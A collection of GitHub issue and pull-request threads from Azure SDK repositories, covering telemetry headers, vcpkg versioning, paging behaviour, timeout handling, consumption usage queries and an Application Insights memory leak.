| added (string; 2025-04-01 04:05:38 – 2025-04-01 07:14:06) | created (timestamp[us]; 2001-10-09 16:19:16 – 2025-01-01 03:51:31) | id (string; length 4–10) | metadata (dict) | source (string; 2 classes) | text (string; length 0 – 1.61M) |
|---|---|---|---|---|---|
2025-04-01T06:36:45.236637
| 2021-08-11T22:11:29
|
967553270
|
{
"authors": [
"antkmsft"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:323",
"repo": "Azure/azure-sdk-for-cpp",
"url": "https://github.com/Azure/azure-sdk-for-cpp/issues/2738"
}
|
gharchive/issue
|
Investigate telemetry possibly not getting in?
From @kyle-patterson:
"[...] I can see that for storage up through -beta.9, but there's no new data coming in from libraries since then. And for keyvault, I can only see two instances of "azsdk-cpp-keyvault/7.2 {os info...}" , where I would have expected keyvault-keys (and more data coming through...) [...]
It almost seems like there was a change in core in the june or july release, but I haven't found anything yet that seems related...
I did confirm that keyvault is passing the expected value when creating the http pipeline: https://github.com/Azure/azure-sdk-for-cpp/blob/83295c69edc5d2a6594c09fcd06eae7073753171/sdk/keyvault/azure-security-keyvault-keys/src/key_client.cpp#L28
it's not hyper-critical, but I'd like to get it resolved in the next release so that we can start getting data again..."
I wrote a simple app that invokes key creation API.
In order to avoid setting up HTTPS decryption on my local machine, I modified the SDK to send requests to a different server on the internet instead of Azure, and read the headers there. I compiled with both the libcurl and WinHTTP transport adapters. Both send azsdk-cpp-keyvault-keys/7.2 (Windows 10 Enterprise 6.3 19043 19041.1.amd64fre.vb_release.191206-1406) as the User-Agent header. (Note that the version does not match the package version; I opened a bug for that - https://github.com/Azure/azure-sdk-for-cpp/issues/2765). But other than that, it looks like everything works as it's supposed to.
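A minimal sketch of that header-inspection setup (an illustrative stand-in server that just prints each request's User-Agent; not the actual test harness used):

from http.server import BaseHTTPRequestHandler, HTTPServer

class AgentLogger(BaseHTTPRequestHandler):
    def _log_agent(self):
        # print the telemetry header the SDK attached to this request
        print("User-Agent:", self.headers.get("User-Agent"))
        self.send_response(200)
        self.end_headers()

    do_GET = _log_agent
    do_PUT = _log_agent  # Key Vault create-key requests arrive as PUTs

HTTPServer(("0.0.0.0", 8080), AgentLogger).serve_forever()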
@kyle-patterson can see the telemetry now. I won't post much detail here (not that anything secret-worthy or sensational was found). Kyle, please reactivate or talk to me if you see problems.
|
2025-04-01T06:36:45.240824
| 2021-10-27T08:00:50
|
1037098577
|
{
"authors": [
"Jinming-Hu",
"vhvb1989"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:324",
"repo": "Azure/azure-sdk-for-cpp",
"url": "https://github.com/Azure/azure-sdk-for-cpp/issues/3000"
}
|
gharchive/issue
|
Feature request: Core SDK should support HTTP request with request body and non-buffered (stream) response
Currently we have three constructor overloads:
with request body, buffered response
without request body, non-buffered response
without request body, buffered response
Storage SDK needs HTTP request with request body and non-buffered (stream) response to implement Query Blob Content
Reopening since it was reverted in https://github.com/Azure/azure-sdk-for-cpp/pull/3033
@vhvb1989 Can you share a timeline for fixing this issue?
I did in the past with: https://github.com/Azure/azure-sdk-for-cpp/pull/3002
However, I reverted it as it was not yet required by Storage. So feel free to re-apply the changes from that PR together with the Storage feature that requires it.
OK, that works for me.
|
2025-04-01T06:36:45.245661
| 2021-03-23T01:35:20
|
838244939
|
{
"authors": [
"Jinming-Hu"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:325",
"repo": "Azure/azure-sdk-for-cpp",
"url": "https://github.com/Azure/azure-sdk-for-cpp/pull/1957"
}
|
gharchive/pull-request
|
mint storage beta 9
Pull Request Checklist
Please leverage this checklist as a reminder to address commonly occurring feedback when submitting a pull request to make sure your PR can be reviewed quickly:
See the detailed list in the contributing guide.
[x] C++ Guidelines
[x] Doxygen docs
[x] Unit tests
[x] No unwanted commits/changes
[x] Descriptive title/description
[x] PR is single purpose
[x] Related issue listed
[x] Comments in source
[x] No typos
[x] Update changelog
[x] Not work-in-progress
[x] External references or docs updated
[x] Self review of PR done
[x] Any breaking changes?
/azp run cpp - storage
/azp run cpp - storage
/azp run cpp - storage
|
2025-04-01T06:36:45.252779
| 2022-06-03T17:57:49
|
1260195432
|
{
"authors": [
"LarryOsterman",
"RickWinter"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:326",
"repo": "Azure/azure-sdk-for-cpp",
"url": "https://github.com/Azure/azure-sdk-for-cpp/pull/3705"
}
|
gharchive/pull-request
|
Removed version>= fields for openssl in vcpkg.json files
Remove version>= fields from vcpkg.json files.
Fixes #3703
These fields are broken because:
These fields are illegal in the vcpkg schema because version>= only works with semver version numbers and 1.1.1n is not a legal semver version number.
We rely on the vcpkg baseline to determine which version of openssl we use, currently 3.0.2.
Pull Request Checklist
Please leverage this checklist as a reminder to address commonly occurring feedback when submitting a pull request to make sure your PR can be reviewed quickly:
See the detailed list in the contributing guide.
[X] C++ Guidelines
[X] Doxygen docs
[X] Unit tests
[X] No unwanted commits/changes
[X] Descriptive title/description
[X] PR is single purpose
[X] Related issue listed
[X] Comments in source
[X] No typos
[X] Update changelog
[X] Not work-in-progress
[X] External references or docs updated
[X] Self review of PR done
[X] Any breaking changes?
Would it be best to have version >= 3.0.2 to ensure its at least of that version?
A great question, not 100% sure to be honest. We define the version we take via our vcpkg baseline (eng\vcpkg-commit.txt), and we'll pick whatever version vcpkg has at that point. As I understand it, the version overrides are there if we specifically require functionality which might be different from the baseline (typically older than the baseline).
If we just want to use whatever the baseline has, we should leave it blank.
|
2025-04-01T06:36:45.255975
| 2020-06-19T15:15:06
|
642043652
|
{
"authors": [
"ArcturusZhang",
"ctaggart"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:327",
"repo": "Azure/azure-sdk-for-go",
"url": "https://github.com/Azure/azure-sdk-for-go/issues/10683"
}
|
gharchive/issue
|
package should be named "avs", not "vmware"
The package should be named "avs", not "vmware". #10454 was merged before I had a chance to review. Please rename the package. See also https://github.com/Azure/sdk-release-request/issues/496.
Current location:
https://github.com/Azure/azure-sdk-for-go/tree/master/services/preview/vmware/mgmt/2019-08-09-preview/vmware
Should be:
https://github.com/Azure/azure-sdk-for-go/tree/master/services/preview/avs/mgmt/2019-08-09-preview/avs
Hi @ctaggart, sorry for that... I will change it, release it, and remove the wrongly named package in the next major version release (at the end of this month)
Should be resolved in v44.0.0
thank you @ArcturusZhang ! ❤️
|
2025-04-01T06:36:45.259482
| 2021-07-08T16:22:01
|
940025381
|
{
"authors": [
"seankane-msft"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:328",
"repo": "Azure/azure-sdk-for-go",
"url": "https://github.com/Azure/azure-sdk-for-go/issues/15004"
}
|
gharchive/issue
|
[Tables] Shared Access Signature Capabilities
Adding SAS capabilities to the Tables SDK
[ ] Add Shared Access Signature credential
[ ] SharedAccessSignaturePolicy for signing requests properly
[ ] generate_account_sas method
[ ] generate_table_sas method
[ ] TableSasPermission object
[ ] AccountSasPermissions object
[ ] ResourceTypes object
Python implementation: https://github.com/Azure/azure-sdk-for-python/pull/15946
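For reference, the account-SAS piece looks roughly like this in the linked Python package (azure-data-tables); the exact signatures below are an assumption based on that implementation:

from datetime import datetime, timedelta, timezone
from azure.core.credentials import AzureNamedKeyCredential
from azure.data.tables import AccountSasPermissions, ResourceTypes, generate_account_sas

credential = AzureNamedKeyCredential("<account-name>", "<account-key>")
sas_token = generate_account_sas(
    credential,
    resource_types=ResourceTypes(service=True, object=True),
    permission=AccountSasPermissions(read=True, write=True),
    expiry=datetime.now(timezone.utc) + timedelta(hours=1),
)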
|
2025-04-01T06:36:45.260958
| 2021-04-22T18:03:07
|
865267964
|
{
"authors": [
"azure-sdk",
"weshaggard"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:329",
"repo": "Azure/azure-sdk-for-go",
"url": "https://github.com/Azure/azure-sdk-for-go/pull/14581"
}
|
gharchive/pull-request
|
Sync eng/common directory with azure-sdk-tools for PR 1562
Sync eng/common directory with azure-sdk-tools for PR https://github.com/Azure/azure-sdk-tools/pull/1562 See eng/common workflow
/check-enforcer reset
|
2025-04-01T06:36:45.263912
| 2021-08-16T18:38:46
|
972002126
|
{
"authors": [
"TomArcherMsft"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:330",
"repo": "Azure/azure-sdk-for-go",
"url": "https://github.com/Azure/azure-sdk-for-go/pull/15301"
}
|
gharchive/pull-request
|
Fixed bugs in Resource Group demo code
[ ] The purpose of this PR is explained in this or a referenced issue.
[ ] The PR does not update generated files.
These files are managed by the codegen framework at Azure/autorest.go.
[ ] Tests are included and/or updated for code changes.
[ ] Updates to CHANGELOG.md are included.
[ ] MIT license headers are included in each file.
@RickWinter I believe I fixed the indentation.
|
2025-04-01T06:36:45.265729
| 2016-12-01T17:07:21
|
192905819
|
{
"authors": [
"martinsawicki",
"paulojohnj"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:331",
"repo": "Azure/azure-sdk-for-java",
"url": "https://github.com/Azure/azure-sdk-for-java/issues/1299"
}
|
gharchive/issue
|
route table / route / subnet association
Is there a path for managing route tables/routes and their subnet associations in beta3? The SDK entry points for route table creation, route management, and subnet association in beta4 are great and are working perfectly. However, since I am currently required to use released or final code as dependencies, is there any way to manage these same things via beta3, or via interaction with an ARM template (I don't believe ARM templates allow for update-only deploys)?
Not easily - there may be a workaround via the use of .inner() on the various involved objects, but that approach will get very hairy very quickly....
beta4 is coming out in about 1-2 weeks though, so better just wait for that.
Ahh, beta4 is the answer I was hoping for; I needed to know a timeline but was not sure where to ask. Thank you very much for the prompt response, and I believe an ARM template can be used temporarily in the meantime.
|
2025-04-01T06:36:45.271272
| 2020-09-24T22:57:54
|
708523493
|
{
"authors": [
"alzimmermsft"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:332",
"repo": "Azure/azure-sdk-for-java",
"url": "https://github.com/Azure/azure-sdk-for-java/pull/15646"
}
|
gharchive/pull-request
|
Decouple PagedIterable and PagedFlux to Prevent Background Page Requests
Fixes #15575
This PR decouples some ContinuablePagedIterable implementations from ContinuablePagedFlux when the ContinuablePagedFlux implementation is an instanceof ContinuablePagedFluxCore. This change allows for finer control of page enumeration by removing our dependency on Reactor's toIterable and toStream implementations on a Flux.
Previously, when our implementation used Reactor's toIterable and toStream to implement ContinuablePagedIterable's functionality, we would see additional pages getting requested. Calling into these methods we passed a batchSize of 1, which indicated to the backing Flux to only request one element, paged, from upstream at a time. But this also served a dual purpose of internal tracking for the backing enumerable to determine when it needed to make additional requests to upstream, so on every next iteration it would hit its internal limit of 1 and make another page request. So, calling ContinuablePagedIterable.streamByPage().findFirst() or ContinuablePagedIterable.iterableByPage().iterator().next() would result in two page requests. Additionally, due to the reactive, event-loop-driven nature of the backing enumerable, these additional page requests could happen after the execution of the mentioned calling patterns completed.
Now, during construction of ContinuablePagedIterable we check the instanceof of the backing ContinuablePagedFlux, and if it is ContinuablePagedFluxCore the PageRetriever and batchSize configuration are taken from the object and ContinuablePagedIterable handles page enumeration with finer-grained control. To maintain the current behavior of Flux.toStream(), a page will be eagerly requested when an Iterator or Stream is created from the ContinuablePagedIterable. Internally, these will be backed by one of two Iterable implementations, ContinuablePagedByItemIterable or ContinuablePagedByPageIterable. The implementations will only make additional page requests when needed: for page-item iterators it will be when the most recently retrieved page has no additional elements, and for page iterators it will be once the next page is requested. The page requests will be blocking, which is functionally equivalent to the previous experience, where both implementations would throw if called from within a non-blocking reactive thread.
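The by-item strategy reduces to a simple loop; a language-neutral sketch (in Python, with a hypothetical get_page retriever standing in for the PageRetriever):

def iterate_by_item(get_page):
    # get_page(token) -> (items, next_token); next_token is None when done.
    token = None
    while True:
        items, token = get_page(token)  # exactly one page request
        yield from items                # drain the page before fetching more
        if token is None:
            return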
In the future we may investigate completely decoupling ContinuablePagedIterable and ContinuablePagedFlux by having both be constructed with PagedRetriever and handle their own enumeration of pages.
/azp run java - appconfiguration - tests
|
2025-04-01T06:36:45.273127
| 2020-11-05T07:33:39
|
736688332
|
{
"authors": [
"vcolin7"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:333",
"repo": "Azure/azure-sdk-for-java",
"url": "https://github.com/Azure/azure-sdk-for-java/pull/17209"
}
|
gharchive/pull-request
|
Added support for encryption algorithms for symmetric keys
Fixes #14805.
Tests are pending.
A few changes are still required, but I'm signing off to unblock. Also, LocalKeyCryptographyClient->LocalCryptographyClient if you haven't GA'd it yet.
We have already GA'd a public LocalCryptographyClient. In the case of LocalKeyCryptographyClient, it's just an abstract class that we extend from for our different internal clients for EC, RSA and AES key operations.
|
2025-04-01T06:36:45.275414
| 2021-11-17T11:57:04
|
1056043391
|
{
"authors": [
"azure-sdk",
"moarychan"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:334",
"repo": "Azure/azure-sdk-for-java",
"url": "https://github.com/Azure/azure-sdk-for-java/pull/25470"
}
|
gharchive/pull-request
|
Make the dependency versions the same with SDK Bom managed
As title.
API changes have been detected in com.azure:azure-core. You can review API changes here
API changes
+ public enum ErrorOptions {
+ THROW,
+ NO_THROW;
+ }
+ public RequestOptions setErrorOptions(EnumSet<ErrorOptions> errorOptions)
We decided not to use the Azure SDK BOM for now, so I'm closing this PR.
|
2025-04-01T06:36:45.278238
| 2023-05-05T21:56:23
|
1698236882
|
{
"authors": [
"alzimmermsft",
"azure-sdk",
"ibrahimrabab"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:335",
"repo": "Azure/azure-sdk-for-java",
"url": "https://github.com/Azure/azure-sdk-for-java/pull/34820"
}
|
gharchive/pull-request
|
STG88 Features
Description
This PR introduces service version support for 2023-01-03, and the following STG88 features:
High Throughput Append Blob for AppendBlobClient
File Share List Handles Access Rights
Add Owner, Group, and Permissions to PathProperties for DataLake
API change check
API changes are not detected in this pull request.
/azp run java - storage - tests
/check-enforcer override
/azp run java - storage - tests
/check-enforcer override
|
2025-04-01T06:36:45.279960
| 2019-05-06T21:01:06
|
440885234
|
{
"authors": [
"AutorestCI"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:336",
"repo": "Azure/azure-sdk-for-java",
"url": "https://github.com/Azure/azure-sdk-for-java/pull/3554"
}
|
gharchive/pull-request
|
[AutoPR graphrbac/data-plane] graph: fix invalid types of accountEnabled
Created to sync https://github.com/Azure/azure-rest-api-specs/pull/5873
This PR has been merged into https://github.com/Azure/azure-sdk-for-java/pull/3099
|
2025-04-01T06:36:45.283870
| 2023-11-09T06:25:09
|
1984920412
|
{
"authors": [
"azure-sdk",
"xinlian12"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:337",
"repo": "Azure/azure-sdk-for-java",
"url": "https://github.com/Azure/azure-sdk-for-java/pull/37591"
}
|
gharchive/pull-request
|
fix429EscapeE2ETimeout
Changes included:
Fixed Issue https://github.com/Azure/azure-sdk-for-java/issues/37419
Issue
429 retries escaped the e2e timeout gating.
Root cause
Currently, the E2ETimeout for point operations is not sitting on top of ClientRetryPolicy, which means each retry from ClientRetryPolicy resets the e2e timeout timer.
Fix
For point operations, the E2E timeout should gate all retries made by the client retry policy
Fixed Issue https://github.com/Azure/azure-sdk-for-java/issues/37589
Issue
E2E timeout is not being applied for readMany (Query cases)
Fix
Apply E2E timeout for readMany query as well
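The gating fix amounts to computing one deadline up front and checking it on every retry; a minimal sketch of the idea (not the actual Java implementation), with TransientError as a stand-in for a retriable failure:

import time

class TransientError(Exception):
    pass  # stand-in for a retriable service error (e.g. a 429)

def call_with_e2e_timeout(operation, timeout_s, max_retries=5):
    deadline = time.monotonic() + timeout_s  # set once, never reset per retry
    for _ in range(max_retries + 1):
        remaining = deadline - time.monotonic()
        if remaining <= 0:
            raise TimeoutError("end-to-end timeout exceeded across retries")
        try:
            return operation(timeout=remaining)
        except TransientError:
            continue
    raise TimeoutError("retry budget exhausted")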
API change check
API changes are not detected in this pull request.
/azp run java - cosmos - tests
|
2025-04-01T06:36:45.286043
| 2024-10-17T03:58:02
|
2593544038
|
{
"authors": [
"XiaofeiCao",
"azure-sdk"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:338",
"repo": "Azure/azure-sdk-for-java",
"url": "https://github.com/Azure/azure-sdk-for-java/pull/42386"
}
|
gharchive/pull-request
|
[Automation] Generate Fluent Lite from Swagger mariadb#package-2020-01-01
[Automation] Generate Fluent Lite from Swagger mariadb#package-2020-01-01
/azp run java - mariadb - ci
API change check
APIView has identified API level changes in this PR and created following API reviews.
com.azure.resourcemanager:azure-resourcemanager-mariadb
|
2025-04-01T06:36:45.290080
| 2019-12-13T01:48:52
|
537304496
|
{
"authors": [
"kushagraThapar"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:339",
"repo": "Azure/azure-sdk-for-java",
"url": "https://github.com/Azure/azure-sdk-for-java/pull/6818"
}
|
gharchive/pull-request
|
Release changes for 3.4.1
Changefeed bug fixes (includes all the bug fixes released in 3.3.3)
Disaster Recovery related bug fixes
Exception when Cosmos DB HTTP response header is larger than 8192 bytes: https://github.com/Azure/azure-sdk-for-java/issues/6069
Vulnerability through dependency in the SDK v3.4.0: https://github.com/Azure/azure-sdk-for-java/issues/6433
CosmosSyncScripts null pointer exception in azure-cosmos: https://github.com/Azure/azure-sdk-for-java/issues/6281
Default consistency level parsing for Bounded Staleness and Consistent Prefix: https://github.com/Azure/azure-sdk-for-java/issues/6707
Null Value Holder change: https://github.com/Azure/azure-sdk-for-java/issues/6307
Closing this PR as there are breaking changes with azure-data-sdk-parent v1.2.0 with latest azure-cosmos pom files.
|
2025-04-01T06:36:45.292495
| 2021-03-08T03:37:18
|
824133234
|
{
"authors": [
"aadamsx",
"ramya-rao-a",
"zfoster"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:340",
"repo": "Azure/azure-sdk-for-js",
"url": "https://github.com/Azure/azure-sdk-for-js/issues/14157"
}
|
gharchive/issue
|
[Cosmos] When are we getting Deno drivers?
Are Cosmos drivers for Deno in the works? We now have MongoDB https://github.com/denodrivers/deno_mongo and all the others -- but no Cosmos. Why don't I see any mention of this? Where are the drivers to use Azure blob storage? How can one use Deno within Azure without any hooks into the services layer?
#13281 is the issue that we are using to track all discussions around deno support in Azure SDKs
@zfoster, @southpolesteve If you have nothing to add here that will be specific to cosmos, I would recommend moving this conversation to #13281
cc @bterlson, @xirzec, @chradek
Yep, that sounds good, thanks! Nothing I can think of, so closing this one
|
2025-04-01T06:36:45.310496
| 2022-01-13T13:54:12
|
1101775443
|
{
"authors": [
"BasiaMH",
"qiaozha"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:341",
"repo": "Azure/azure-sdk-for-js",
"url": "https://github.com/Azure/azure-sdk-for-js/issues/19835"
}
|
gharchive/issue
|
Sorting arm-consumption 'usage details' by resource group
I am using the arm-consumption package to get the usage details for a subscription and am finding it difficult to sort the results in a meaningful way. I need to get them by resource group, but 1) it does not appear to be possible to filter the details by resource group when getting the data from Azure, and 2) the 'resource group' property on the usage details items does not correspond directly to the resource group; i.e., if the resource group is called 'ExampleGroup' (as per arm-resources or portal.azure.com), the usage details 'resource group' property is a longer string which appears to begin with the first few letters of the resource group, but not in a consistent enough way to search on. (There are a larger number of 'resource groups' appearing in arm-consumption than in arm-resources, and their names do not appear to correlate in a consistent, searchable way.)
I would like to either be able to use a resource group filter when fetching the usage details, and/or have a property in the usage details that gives the resource group of the item as defined in arm-resources.
I have tried getting all the usage details data and sorting it myself by resource group, however then I encounter the problem where the resource group name that I need to sort by is not a property of the usage details items.
I have also tried looking to see if there is any existing API that provides a map between the arm-resources resource groups names and the arm-consumption resource group names, but have not so far found one.
@BasiaMH I think you can pass a scope parameter to get all the usage details within one resource group: https://github.com/Azure/azure-rest-api-specs/blob/main/specification/consumption/resource-manager/Microsoft.Consumption/stable/2021-10-01/examples/UsageDetailsListByManagementGroup.json#L6. Let me know if that works for you? Thanks
Thanks, I can pass subscriptions/{subscriptionId} in the scope, which returns all usage details for our subscription, but if I try to pass the resourceGroups/{resourceGroupName} I get no results.
What is returned is an array with one item, containing a url: https://costmanagement.trafficmanager.net/subscriptions/c9e88f4c-b9f3-4941-b51e-c9cbbfb9742e/resourcegroups/dicomweb-group/providers/Microsoft.Consumption/usagedetails/Export
And when I navigate to the url it just gives an error message. Either: "The resource you are looking for has been removed, had its name changed, or is temporarily unavailable."
or:
{"message":"No HTTP resource was found that matches the request URI 'https://costmanagement.trafficmanager.net/subscriptions/c9e88f4c-b9f3-4941-b51e-c9cbbfb9742e/resourcegroups/dicomweb-group/providers/Microsoft.Consumption/usagedetails/Export'.","messageDetail":"No route providing a controller name was found to match request URI 'https://costmanagement.trafficmanager.net/subscriptions/c9e88f4c-b9f3-4941-b51e-c9cbbfb9742e/resourcegroups/dicomweb-group/providers/Microsoft.Consumption/usagedetails/Export'"}
@BasiaMH Did you pass the scope like /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName} ?
That's exactly what I tried, yes.
(Before that I tried including resourceGroups in a filter, but that just returned all the data unfiltered.)
Looks like we need some help from service team.
@mitagarg Is it possible that you could help here, as I see you are the author of this PR https://github.com/Azure/azure-rest-api-specs/pull/17013
Hi, is there any update or further information on this problem? Or a different workaround someone could suggest to somehow get the usage and cost per resource or per resource group?
Thanks
@BasiaMH Hi, since this is probably an issue on the service side, could you open a ticket here https://docs.microsoft.com/en-us/answers/topics/azure-cost-management.html so that you can get direct support from the service team?
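For reference, the scope-based listing discussed above looks roughly like this in the Python management SDK (azure-mgmt-consumption); this is an illustrative analog of the arm-consumption call, not a verified fix for the empty-result behavior reported here:

from azure.identity import DefaultAzureCredential
from azure.mgmt.consumption import ConsumptionManagementClient

client = ConsumptionManagementClient(DefaultAzureCredential(), "<subscription-id>")

# resource-group scope, as suggested above
scope = "/subscriptions/<subscription-id>/resourceGroups/<resource-group-name>"
for detail in client.usage_details.list(scope=scope):
    print(detail.name)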
|
2025-04-01T06:36:45.316493
| 2019-05-02T03:55:14
|
439417810
|
{
"authors": [
"ramya-rao-a"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:342",
"repo": "Azure/azure-sdk-for-js",
"url": "https://github.com/Azure/azure-sdk-for-js/issues/2660"
}
|
gharchive/issue
|
[Event Hubs] Re-visit all parameter validations
Relevant sections from General guidelines:
The client library will have a client object with several methods that call methods on the service. Service parameters are directly passed across the wire to an Azure service. Client parameters are not passed directly to the service, but used within the SDK to fulfill the request. Examples of client parameters include values that are used to construct a URI, or a file that needs to be uploaded to storage.
✅ DO validate client parameters.
⛔️ DO NOT validate service parameters. This includes null checks, empty strings, and other common validating conditions. Let the service validate any request parameters.
✅ DO validate the developer experience when the service parameters are invalid to ensure appropriate error messages are generated by the service. If the developer experience is compromised due to service-side error messages, work with the service team to correct prior to release.
Relevant sections from Typescript guidelines:
YOU SHOULD coerce incorrect types into an appropriate type, if possible. JavaScript users expect some amount of fuzziness with parameters as the standard library tends to coerce types if possible. TypeScript users should get pedantic types as they have opted in to types and expect errors.
Relevant work done in Service Bus regarding this: https://github.com/Azure/azure-sdk-for-js/issues/1145#issuecomment-481893308
Please use the parameter validations done in Service Bus as a reference
Main points to be kept in mind for parameter validations
Missing mandatory arguments should throw an error.
If the expected type for an argument is string, use String() to convert the given value to a string. This ensures we do our best to coerce the given input to a string for our JavaScript users
If the expected type for an argument is an array and the given value is not an array, then make an array out of the given value
If the given value doesn't match the expected type and this results in us not being able to form a request to the service, then throw an error.
For reference, see what was done for Service Bus
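A compact illustration of those coercion rules (the thread is about the JS SDK; this is just a Python analog of the same behavior):

def coerce_string(name, value):
    # missing mandatory arguments should throw
    if value is None:
        raise TypeError(f"Missing required argument: {name}")
    return str(value)  # best-effort coercion, mirroring String(value) in JS

def coerce_array(name, value):
    if value is None:
        raise TypeError(f"Missing required argument: {name}")
    # wrap a lone value, mirroring the array rule above
    return value if isinstance(value, list) else [value]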
Done with #3652
|
2025-04-01T06:36:45.318443
| 2020-04-29T03:47:20
|
608757284
|
{
"authors": [
"danieljurek",
"praveenkuttappan",
"ramya-rao-a"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:343",
"repo": "Azure/azure-sdk-for-js",
"url": "https://github.com/Azure/azure-sdk-for-js/issues/8594"
}
|
gharchive/issue
|
Propagate changes to work around DNS resolution issue in Linux
See: https://github.com/Azure/azure-sdk-for-java/pull/10576/files
We've seen issues where DNS resolution fails in Ubuntu 18. This workaround fixes that problem. This only needs to run on Ubuntu 18 instances.
@chradek, @richardpark-msft Any chance this can solve our dns woes with linux in SB and EH?
Closing this issue. We already have this integrated with a step to bypass local DNS using the common template.
|
2025-04-01T06:36:45.321170
| 2021-02-23T00:55:27
|
813997040
|
{
"authors": [
"JoshuaLai",
"beltr0n"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:344",
"repo": "Azure/azure-sdk-for-js",
"url": "https://github.com/Azure/azure-sdk-for-js/pull/13927"
}
|
gharchive/pull-request
|
Bertong sms impl
This draft PR is to solicit feedback, primarily on whether what I'm testing is appropriate and consistent with what we have done
/azp run python - communication - tests
/azp run js - communication - tests
/check-enforcer reset
/azp run js - communication-sms - tests
/azp run js - communication-sms - tests
/azp run js - communication-sms - tests
/azp run js - communication-sms - tests
/azp run js - communication-sms - tests
/azp run js - communication-sms - tests
|
2025-04-01T06:36:45.322550
| 2024-02-28T08:04:40
|
2158349036
|
{
"authors": [
"azure-sdk",
"kazrael2119"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:345",
"repo": "Azure/azure-sdk-for-js",
"url": "https://github.com/Azure/azure-sdk-for-js/pull/28697"
}
|
gharchive/pull-request
|
push communication-email recordings
fix https://github.com/Azure/azure-sdk-for-js/issues/28656
API change check
API changes are not detected in this pull request.
|
2025-04-01T06:36:45.324009
| 2024-10-28T05:40:53
|
2617358821
|
{
"authors": [
"azure-sdk"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:346",
"repo": "Azure/azure-sdk-for-js",
"url": "https://github.com/Azure/azure-sdk-for-js/pull/31544"
}
|
gharchive/pull-request
|
Post release automated changes for databoundaries releases
Post release automated changes for azure-arm-databoundaries
API change check
API changes are not detected in this pull request.
|
2025-04-01T06:36:45.325593
| 2020-02-07T16:09:24
|
561731350
|
{
"authors": [
"sadasant"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:347",
"repo": "Azure/azure-sdk-for-js",
"url": "https://github.com/Azure/azure-sdk-for-js/pull/7290"
}
|
gharchive/pull-request
|
[core-amqp] Fixed a build error on master
Seems like a fitting solution for a problem we're having on master.
The error is visible here: https://dev.azure.com/azure-sdk/public/_build/results?buildId=255040&view=logs&j=23e2e6de-b7c3-5918-7121-f16b46172e49&t=9c960e92-0110-52f6-5b54-96f3b7fea4ea&l=697
This isn't necessary. My master was outdated.
|
2025-04-01T06:36:45.333068
| 2020-03-16T01:35:30
|
581920916
|
{
"authors": [
"Petermarcu",
"jesuissur",
"seanmcc-msft",
"speedy-ms"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:348",
"repo": "Azure/azure-sdk-for-net",
"url": "https://github.com/Azure/azure-sdk-for-net/issues/10626"
}
|
gharchive/issue
|
[BUG] Memory Leaking When SDK Combined With Application Insights
Describe the bug
When using the Azure.Storage.Queues (v12.3.0) NuGet package in combination with Microsoft.ApplicationInsights.AspNetCore (v2.13.1) in a .NET Core 3.1 application that is constantly polling queues for new messages, we find that the number of objects built up in memory steadily increases, specifically:
Microsoft.ApplicationInsights.DependencyCollector.Implementation.AzureSdkDiagnosticsEventHandler - creating about 5000 objects a minute and the garbage collector is not disposing them.
Expected behavior
That the AI objects would be cleaned up by the GC
Actual behavior (include Exception or Stack Trace)
Eventually the app will start throwing OutOfMemoryExceptions.
To Reproduce
Have the following in your app startup:
public void ConfigureServices(IServiceCollection services)
{
services.AddApplicationInsightsTelemetry();
}
Add a hosted service:
var host = new WebHostBuilder()
.UseKestrel()
.ConfigureServices(c => c.AddHostedService<QueueWorker>())
Have the worker constantly new up a QueueClient to check for queue messages.
Environment:
Azure.Storage.Queues 12.3.0
.NET runtime version 3.1.101
IDE and version : Visual Studio Professional v 16.4.5
For step 3, why not have the worker re-use the same QueueClient? The clients are thread-safe.
That has proven to be the workaround we have gone with - storing any queue clients that we have created in a static dictionary that remains for the lifetime of the app (we have a web app that uses this shared code and would be newing up the clients pretty heavily to create queue messages).
I will leave it open for others to decide if this is a bug that needs fixing or if it was simply a case of us "using it wrong", in which case it can be closed.
